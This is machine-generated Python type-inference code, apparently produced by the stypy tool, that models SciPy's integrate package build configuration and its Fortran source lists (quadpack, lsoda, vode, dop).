import_32066 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 4, 0), 'os.path')
if (type(import_32066) is not StypyTypeError):
if (import_32066 != 'pyd_module'):
__import__(import_32066)
sys_modules_32067 = sys.modules[import_32066]
import_from_module(stypy.reporting.localization.Localization(__file__, 4, 0), 'os.path', sys_modules_32067.module_type_store, module_type_store, ['join'])
nest_module(stypy.reporting.localization.Localization(__file__, 4, 0), __file__, sys_modules_32067, sys_modules_32067.module_type_store, module_type_store)
else:
from os.path import join
import_from_module(stypy.reporting.localization.Localization(__file__, 4, 0), 'os.path', None, module_type_store, ['join'], [join])
else:
# Assigning a type to the variable 'os.path' (line 4)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 4, 0), 'os.path', import_32066)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/integrate/')
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 6, 0))
# 'from scipy._build_utils import numpy_nodepr_api' statement (line 6)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/integrate/')
import_32068 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 6, 0), 'scipy._build_utils')
if (type(import_32068) is not StypyTypeError):
if (import_32068 != 'pyd_module'):
__import__(import_32068)
sys_modules_32069 = sys.modules[import_32068]
import_from_module(stypy.reporting.localization.Localization(__file__, 6, 0), 'scipy._build_utils', sys_modules_32069.module_type_store, module_type_store, ['numpy_nodepr_api'])
nest_module(stypy.reporting.localization.Localization(__file__, 6, 0), __file__, sys_modules_32069, sys_modules_32069.module_type_store, module_type_store)
else:
from scipy._build_utils import numpy_nodepr_api
import_from_module(stypy.reporting.localization.Localization(__file__, 6, 0), 'scipy._build_utils', None, module_type_store, ['numpy_nodepr_api'], [numpy_nodepr_api])
else:
# Assigning a type to the variable 'scipy._build_utils' (line 6)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 6, 0), 'scipy._build_utils', import_32068)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/integrate/')
@norecursion
def configuration(localization, *varargs, **kwargs):
global module_type_store
# Assign values to the parameters with defaults
str_32070 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 9, 33), 'str', '')
# Getting the type of 'None' (line 9)
None_32071 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 9, 45), 'None')
defaults = [str_32070, None_32071]
# Create a new context for function 'configuration'
module_type_store = module_type_store.open_function_context('configuration', 9, 0, False)
# Passed parameters checking function
configuration.stypy_localization = localization
configuration.stypy_type_of_self = None
configuration.stypy_type_store = module_type_store
configuration.stypy_function_name = 'configuration'
configuration.stypy_param_names_list = ['parent_package', 'top_path']
configuration.stypy_varargs_param_name = None
configuration.stypy_kwargs_param_name = None
configuration.stypy_call_defaults = defaults
configuration.stypy_call_varargs = varargs
configuration.stypy_call_kwargs = kwargs
arguments = process_argument_values(localization, None, module_type_store, 'configuration', ['parent_package', 'top_path'], None, None, defaults, varargs, kwargs)
if is_error_type(arguments):
# Destroy the current context
module_type_store = module_type_store.close_function_context()
return arguments
# Initialize method data
init_call_information(module_type_store, 'configuration', localization, ['parent_package', 'top_path'], arguments)
# Default return type storage variable (SSA)
# Assigning a type to the variable 'stypy_return_type'
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 0, 0), 'stypy_return_type', None)
# ################# Begin of 'configuration(...)' code ##################
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 10, 4))
# 'from numpy.distutils.misc_util import Configuration' statement (line 10)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/integrate/')
import_32072 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 10, 4), 'numpy.distutils.misc_util')
if (type(import_32072) is not StypyTypeError):
if (import_32072 != 'pyd_module'):
__import__(import_32072)
sys_modules_32073 = sys.modules[import_32072]
import_from_module(stypy.reporting.localization.Localization(__file__, 10, 4), 'numpy.distutils.misc_util', sys_modules_32073.module_type_store, module_type_store, ['Configuration'])
nest_module(stypy.reporting.localization.Localization(__file__, 10, 4), __file__, sys_modules_32073, sys_modules_32073.module_type_store, module_type_store)
else:
from numpy.distutils.misc_util import Configuration
import_from_module(stypy.reporting.localization.Localization(__file__, 10, 4), 'numpy.distutils.misc_util', None, module_type_store, ['Configuration'], [Configuration])
else:
# Assigning a type to the variable 'numpy.distutils.misc_util' (line 10)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 10, 4), 'numpy.distutils.misc_util', import_32072)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/integrate/')
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 11, 4))
# 'from numpy.distutils.system_info import get_info' statement (line 11)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/integrate/')
import_32074 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 11, 4), 'numpy.distutils.system_info')
if (type(import_32074) is not StypyTypeError):
if (import_32074 != 'pyd_module'):
__import__(import_32074)
sys_modules_32075 = sys.modules[import_32074]
import_from_module(stypy.reporting.localization.Localization(__file__, 11, 4), 'numpy.distutils.system_info', sys_modules_32075.module_type_store, module_type_store, ['get_info'])
nest_module(stypy.reporting.localization.Localization(__file__, 11, 4), __file__, sys_modules_32075, sys_modules_32075.module_type_store, module_type_store)
else:
from numpy.distutils.system_info import get_info
import_from_module(stypy.reporting.localization.Localization(__file__, 11, 4), 'numpy.distutils.system_info', None, module_type_store, ['get_info'], [get_info])
else:
# Assigning a type to the variable 'numpy.distutils.system_info' (line 11)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 11, 4), 'numpy.distutils.system_info', import_32074)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/integrate/')
# Assigning a Call to a Name (line 12):
# Call to Configuration(...): (line 12)
# Processing the call arguments (line 12)
str_32077 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 12, 27), 'str', 'integrate')
# Getting the type of 'parent_package' (line 12)
parent_package_32078 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 40), 'parent_package', False)
# Getting the type of 'top_path' (line 12)
top_path_32079 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 56), 'top_path', False)
# Processing the call keyword arguments (line 12)
kwargs_32080 = {}
# Getting the type of 'Configuration' (line 12)
Configuration_32076 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 13), 'Configuration', False)
# Calling Configuration(args, kwargs) (line 12)
Configuration_call_result_32081 = invoke(stypy.reporting.localization.Localization(__file__, 12, 13), Configuration_32076, *[str_32077, parent_package_32078, top_path_32079], **kwargs_32080)
# Assigning a type to the variable 'config' (line 12)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 12, 4), 'config', Configuration_call_result_32081)
# Assigning a Call to a Name (line 15):
# Call to dict(...): (line 15)
# Processing the call arguments (line 15)
# Call to get_info(...): (line 15)
# Processing the call arguments (line 15)
str_32084 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 15, 31), 'str', 'lapack_opt')
# Processing the call keyword arguments (line 15)
int_32085 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 15, 60), 'int')
keyword_32086 = int_32085
kwargs_32087 = {'notfound_action': keyword_32086}
# Getting the type of 'get_info' (line 15)
get_info_32083 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 15, 22), 'get_info', False)
# Calling get_info(args, kwargs) (line 15)
get_info_call_result_32088 = invoke(stypy.reporting.localization.Localization(__file__, 15, 22), get_info_32083, *[str_32084], **kwargs_32087)
# Processing the call keyword arguments (line 15)
kwargs_32089 = {}
# Getting the type of 'dict' (line 15)
dict_32082 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 15, 17), 'dict', False)
# Calling dict(args, kwargs) (line 15)
dict_call_result_32090 = invoke(stypy.reporting.localization.Localization(__file__, 15, 17), dict_32082, *[get_info_call_result_32088], **kwargs_32089)
# Assigning a type to the variable 'lapack_opt' (line 15)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 15, 4), 'lapack_opt', dict_call_result_32090)
# Assigning a Call to a Name (line 18):
# Call to pop(...): (line 18)
# Processing the call arguments (line 18)
str_32093 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 18, 33), 'str', 'libraries')
# Obtaining an instance of the builtin type 'list' (line 18)
list_32094 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 18, 46), 'list')
# Adding type elements to the builtin type 'list' instance (line 18)
# Processing the call keyword arguments (line 18)
kwargs_32095 = {}
# Getting the type of 'lapack_opt' (line 18)
lapack_opt_32091 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 18, 18), 'lapack_opt', False)
# Obtaining the member 'pop' of a type (line 18)
pop_32092 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 18, 18), lapack_opt_32091, 'pop')
# Calling pop(args, kwargs) (line 18)
pop_call_result_32096 = invoke(stypy.reporting.localization.Localization(__file__, 18, 18), pop_32092, *[str_32093, list_32094], **kwargs_32095)
# Assigning a type to the variable 'lapack_libs' (line 18)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 18, 4), 'lapack_libs', pop_call_result_32096)
# Assigning a List to a Name (line 20):
# Obtaining an instance of the builtin type 'list' (line 20)
list_32097 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 20, 15), 'list')
# Adding type elements to the builtin type 'list' instance (line 20)
# Adding element type (line 20)
# Call to join(...): (line 20)
# Processing the call arguments (line 20)
str_32099 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 20, 21), 'str', 'mach')
str_32100 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 20, 28), 'str', '*.f')
# Processing the call keyword arguments (line 20)
kwargs_32101 = {}
# Getting the type of 'join' (line 20)
join_32098 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 20, 16), 'join', False)
# Calling join(args, kwargs) (line 20)
join_call_result_32102 = invoke(stypy.reporting.localization.Localization(__file__, 20, 16), join_32098, *[str_32099, str_32100], **kwargs_32101)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 20, 15), list_32097, join_call_result_32102)
# Assigning a type to the variable 'mach_src' (line 20)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 20, 4), 'mach_src', list_32097)
# Assigning a List to a Name (line 21):
# Obtaining an instance of the builtin type 'list' (line 21)
list_32103 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 21, 19), 'list')
# Adding type elements to the builtin type 'list' instance (line 21)
# Adding element type (line 21)
# Call to join(...): (line 21)
# Processing the call arguments (line 21)
str_32105 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 21, 25), 'str', 'quadpack')
str_32106 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 21, 37), 'str', '*.f')
# Processing the call keyword arguments (line 21)
kwargs_32107 = {}
# Getting the type of 'join' (line 21)
join_32104 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 21, 20), 'join', False)
# Calling join(args, kwargs) (line 21)
join_call_result_32108 = invoke(stypy.reporting.localization.Localization(__file__, 21, 20), join_32104, *[str_32105, str_32106], **kwargs_32107)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 21, 19), list_32103, join_call_result_32108)
# Assigning a type to the variable 'quadpack_src' (line 21)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 21, 4), 'quadpack_src', list_32103)
# Assigning a ListComp to a Name (line 22):
# Calculating list comprehension
# Calculating comprehension expression
# Obtaining an instance of the builtin type 'list' (line 22)
list_32114 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 22, 47), 'list')
# Adding type elements to the builtin type 'list' instance (line 22)
# Adding element type (line 22)
str_32115 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 23, 8), 'str', 'blkdta000.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32115)
# Adding element type (line 22)
str_32116 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 23, 23), 'str', 'bnorm.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32116)
# Adding element type (line 22)
str_32117 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 23, 34), 'str', 'cfode.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32117)
# Adding element type (line 22)
str_32118 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 24, 8), 'str', 'ewset.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32118)
# Adding element type (line 22)
str_32119 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 24, 19), 'str', 'fnorm.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32119)
# Adding element type (line 22)
str_32120 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 24, 30), 'str', 'intdy.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32120)
# Adding element type (line 22)
str_32121 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 8), 'str', 'lsoda.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32121)
# Adding element type (line 22)
str_32122 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 19), 'str', 'prja.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32122)
# Adding element type (line 22)
str_32123 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 29), 'str', 'solsy.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32123)
# Adding element type (line 22)
str_32124 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 40), 'str', 'srcma.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32124)
# Adding element type (line 22)
str_32125 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 26, 8), 'str', 'stoda.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32125)
# Adding element type (line 22)
str_32126 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 26, 19), 'str', 'vmnorm.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32126)
# Adding element type (line 22)
str_32127 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 26, 31), 'str', 'xerrwv.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32127)
# Adding element type (line 22)
str_32128 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 26, 43), 'str', 'xsetf.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32128)
# Adding element type (line 22)
str_32129 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 27, 8), 'str', 'xsetun.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32129)
comprehension_32130 = get_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 17), list_32114)
# Assigning a type to the variable 'fn' (line 22)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 22, 17), 'fn', comprehension_32130)
# Call to join(...): (line 22)
# Processing the call arguments (line 22)
str_32110 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 22, 22), 'str', 'odepack')
# Getting the type of 'fn' (line 22)
fn_32111 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 22, 33), 'fn', False)
# Processing the call keyword arguments (line 22)
kwargs_32112 = {}
# Getting the type of 'join' (line 22)
join_32109 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 22, 17), 'join', False)
# Calling join(args, kwargs) (line 22)
join_call_result_32113 = invoke(stypy.reporting.localization.Localization(__file__, 22, 17), join_32109, *[str_32110, fn_32111], **kwargs_32112)
list_32131 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 22, 17), 'list')
set_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 17), list_32131, join_call_result_32113)
# Assigning a type to the variable 'lsoda_src' (line 22)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 22, 4), 'lsoda_src', list_32131)
# Assigning a List to a Name (line 28):
# Obtaining an instance of the builtin type 'list' (line 28)
list_32132 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 28, 15), 'list')
# Adding type elements to the builtin type 'list' instance (line 28)
# Adding element type (line 28)
# Call to join(...): (line 28)
# Processing the call arguments (line 28)
str_32134 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 28, 21), 'str', 'odepack')
str_32135 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 28, 32), 'str', 'vode.f')
# Processing the call keyword arguments (line 28)
kwargs_32136 = {}
# Getting the type of 'join' (line 28)
join_32133 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 28, 16), 'join', False)
# Calling join(args, kwargs) (line 28)
join_call_result_32137 = invoke(stypy.reporting.localization.Localization(__file__, 28, 16), join_32133, *[str_32134, str_32135], **kwargs_32136)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 28, 15), list_32132, join_call_result_32137)
# Adding element type (line 28)
# Call to join(...): (line 28)
# Processing the call arguments (line 28)
str_32139 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 28, 48), 'str', 'odepack')
str_32140 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 28, 59), 'str', 'zvode.f')
# Processing the call keyword arguments (line 28)
kwargs_32141 = {}
# Getting the type of 'join' (line 28)
join_32138 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 28, 43), 'join', False)
# Calling join(args, kwargs) (line 28)
join_call_result_32142 = invoke(stypy.reporting.localization.Localization(__file__, 28, 43), join_32138, *[str_32139, str_32140], **kwargs_32141)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 28, 15), list_32132, join_call_result_32142)
# Assigning a type to the variable 'vode_src' (line 28)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 28, 4), 'vode_src', list_32132)
# Assigning a List to a Name (line 29):
# Obtaining an instance of the builtin type 'list' (line 29)
list_32143 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 29, 14), 'list')
# Adding type elements to the builtin type 'list' instance (line 29)
# Adding element type (line 29)
# Call to join(...): (line 29)
# Processing the call arguments (line 29)
str_32145 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 29, 20), 'str', 'dop')
str_32146 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 29, 26), 'str', '*.f')
# Processing the call keyword arguments (line 29)
kwargs_32147 = {}
# Getting the type of 'join' (line 29)
join_32144 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 29, 15), 'join', False)
# Calling join(args, kwargs) (line 29)
join_call_result_32148 = invoke(stypy.reporting.localization.Localization(__file__, 29, 15), join_32144, *[str_32145, str_32146], **kwargs_32147)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 29, 14), list_32143, join_call_result_32148)
# Assigning a type to the variable 'dop_src' (line 29)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 29, 4), 'dop_src', list_32143)
# Assigning a List to a Name (line 30):
# Obtaining an instance of the builtin type 'list' (line 30)
list_32149 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 30, 24), 'list')
# Adding type elements to the builtin type 'list' instance (line 30)
# Adding element type (line 30)
# Call to join(...): (line 30)
# Processing the call arguments (line 30)
str_32151 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 30, 30), 'str', 'tests')
str_32152 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 30, 38), 'str', '_test_multivariate.c')
# Processing the call keyword arguments (line 30)
kwargs_32153 = {}
# Getting the type of 'join' (line 30)
join_32150 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 30, 25), 'join', False)
# Calling join(args, kwargs) (line 30)
join_call_result_32154 = invoke(stypy.reporting.localization.Localization(__file__, 30, 25), join_32150, *[str_32151, str_32152], **kwargs_32153)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 30, 24), list_32149, join_call_result_32154)
# Assigning a type to the variable 'quadpack_test_src' (line 30)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 30, 4), 'quadpack_test_src', list_32149)
# Assigning a List to a Name (line 31):
# Obtaining an instance of the builtin type 'list' (line 31)
list_32155 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 31, 29), 'list')
# Adding type elements to the builtin type 'list' instance (line 31)
# Adding element type (line 31)
# Call to join(...): (line 31)
# Processing the call arguments (line 31)
str_32157 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 31, 35), 'str', 'tests')
str_32158 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 31, 44), 'str', 'banded5x5.f')
# Processing the call keyword arguments (line 31)
kwargs_32159 = {}
# Getting the type of 'join' (line 31)
join_32156 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 31, 30), 'join', False)
# Calling join(args, kwargs) (line 31)
join_call_result_32160 = invoke(stypy.reporting.localization.Localization(__file__, 31, 30), join_32156, *[str_32157, str_32158], **kwargs_32159)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 31, 29), list_32155, join_call_result_32160)
# Assigning a type to the variable 'odeint_banded_test_src' (line 31)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 31, 4), 'odeint_banded_test_src', list_32155)
# Call to add_library(...): (line 33)
# Processing the call arguments (line 33)
str_32163 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 33, 23), 'str', 'mach')
# Processing the call keyword arguments (line 33)
# Getting the type of 'mach_src' (line 33)
mach_src_32164 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 33, 39), 'mach_src', False)
keyword_32165 = mach_src_32164
# Obtaining an instance of the builtin type 'dict' (line 34)
dict_32166 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 34, 33), 'dict')
# Adding type elements to the builtin type 'dict' instance (line 34)
# Adding element type (key, value) (line 34)
str_32167 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 34, 34), 'str', 'noopt')
# Obtaining an instance of the builtin type 'tuple' (line 34)
tuple_32168 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 34, 43), 'tuple')
# Adding type elements to the builtin type 'tuple' instance (line 34)
# Adding element type (line 34)
# Getting the type of '__file__' (line 34)
file___32169 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 34, 43), '__file__', False)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 34, 43), tuple_32168, file___32169)
# Adding element type (line 34)
int_32170 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 34, 52), 'int')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 34, 43), tuple_32168, int_32170)
set_contained_elements_type(stypy.reporting.localization.Localization(__file__, 34, 33), dict_32166, (str_32167, tuple_32168))
keyword_32171 = dict_32166
kwargs_32172 = {'sources': keyword_32165, 'config_fc': keyword_32171}
# Getting the type of 'config' (line 33)
config_32161 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 33, 4), 'config', False)
# Obtaining the member 'add_library' of a type (line 33)
add_library_32162 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 33, 4), config_32161, 'add_library')
# Calling add_library(args, kwargs) (line 33)
add_library_call_result_32173 = invoke(stypy.reporting.localization.Localization(__file__, 33, 4), add_library_32162, *[str_32163], **kwargs_32172)
# Call to add_library(...): (line 35)
# Processing the call arguments (line 35)
str_32176 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 35, 23), 'str', 'quadpack')
# Processing the call keyword arguments (line 35)
# Getting the type of 'quadpack_src' (line 35)
quadpack_src_32177 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 35, 43), 'quadpack_src', False)
keyword_32178 = quadpack_src_32177
kwargs_32179 = {'sources': keyword_32178}
# Getting the type of 'config' (line 35)
config_32174 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 35, 4), 'config', False)
# Obtaining the member 'add_library' of a type (line 35)
add_library_32175 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 35, 4), config_32174, 'add_library')
# Calling add_library(args, kwargs) (line 35)
add_library_call_result_32180 = invoke(stypy.reporting.localization.Localization(__file__, 35, 4), add_library_32175, *[str_32176], **kwargs_32179)
# Call to add_library(...): (line 36)
# Processing the call arguments (line 36)
str_32183 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 36, 23), 'str', 'lsoda')
# Processing the call keyword arguments (line 36)
# Getting the type of 'lsoda_src' (line 36)
lsoda_src_32184 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 36, 40), 'lsoda_src', False)
keyword_32185 = lsoda_src_32184
kwargs_32186 = {'sources': keyword_32185}
# Getting the type of 'config' (line 36)
config_32181 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 36, 4), 'config', False)
# Obtaining the member 'add_library' of a type (line 36)
add_library_32182 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 36, 4), config_32181, 'add_library')
# Calling add_library(args, kwargs) (line 36)
add_library_call_result_32187 = invoke(stypy.reporting.localization.Localization(__file__, 36, 4), add_library_32182, *[str_32183], **kwargs_32186)
# Call to add_library(...): (line 37)
# Processing the call arguments (line 37)
str_32190 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 37, 23), 'str', 'vode')
# Processing the call keyword arguments (line 37)
# Getting the type of 'vode_src' (line 37)
vode_src_32191 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 37, 39), 'vode_src', False)
keyword_32192 = vode_src_32191
kwargs_32193 = {'sources': keyword_32192}
# Getting the type of 'config' (line 37)
config_32188 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 37, 4), 'config', False)
# Obtaining the member 'add_library' of a type (line 37)
add_library_32189 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 37, 4), config_32188, 'add_library')
# Calling add_library(args, kwargs) (line 37)
add_library_call_result_32194 = invoke(stypy.reporting.localization.Localization(__file__, 37, 4), add_library_32189, *[str_32190], **kwargs_32193)
# Call to add_library(...): (line 38)
# Processing the call arguments (line 38)
str_32197 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 38, 23), 'str', 'dop')
# Processing the call keyword arguments (line 38)
# Getting the type of 'dop_src' (line 38)
dop_src_32198 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 38, 38), 'dop_src', False)
keyword_32199 = dop_src_32198
kwargs_32200 = {'sources': keyword_32199}
# Getting the type of 'config' (line 38)
config_32195 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 38, 4), 'config', False)
# Obtaining the member 'add_library' of a type (line 38)
add_library_32196 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 38, 4), config_32195, 'add_library')
# Calling add_library(args, kwargs) (line 38)
add_library_call_result_32201 = invoke(stypy.reporting.localization.Localization(__file__, 38, 4), add_library_32196, *[str_32197], **kwargs_32200)
# Assigning a List to a Name (line 42):
# Obtaining an instance of the builtin type 'list' (line 42)
list_32202 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 42, 19), 'list')
# Adding type elements to the builtin type 'list' instance (line 42)
# Adding element type (line 42)
# Call to join(...): (line 42)
# Processing the call arguments (line 42)
# Call to dirname(...): (line 42)
# Processing the call arguments (line 42)
# Getting the type of '__file__' (line 42)
file___32207 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 42, 41), '__file__', False)
# Processing the call keyword arguments (line 42)
kwargs_32208 = {}
# Getting the type of 'os' (line 42)
os_32204 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 42, 25), 'os', False)
# Obtaining the member 'path' of a type (line 42)
path_32205 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 42, 25), os_32204, 'path')
# Obtaining the member 'dirname' of a type (line 42)
dirname_32206 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 42, 25), path_32205, 'dirname')
# Calling dirname(args, kwargs) (line 42)
dirname_call_result_32209 = invoke(stypy.reporting.localization.Localization(__file__, 42, 25), dirname_32206, *[file___32207], **kwargs_32208)
str_32210 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 42, 52), 'str', '..')
str_32211 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 42, 58), 'str', '_lib')
str_32212 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 42, 66), 'str', 'src')
# Processing the call keyword arguments (line 42)
kwargs_32213 = {}
# Getting the type of 'join' (line 42)
join_32203 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 42, 20), 'join', False)
# Calling join(args, kwargs) (line 42)
join_call_result_32214 = invoke(stypy.reporting.localization.Localization(__file__, 42, 20), join_32203, *[dirname_call_result_32209, str_32210, str_32211, str_32212], **kwargs_32213)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 42, 19), list_32202, join_call_result_32214)
# Assigning a type to the variable 'include_dirs' (line 42)
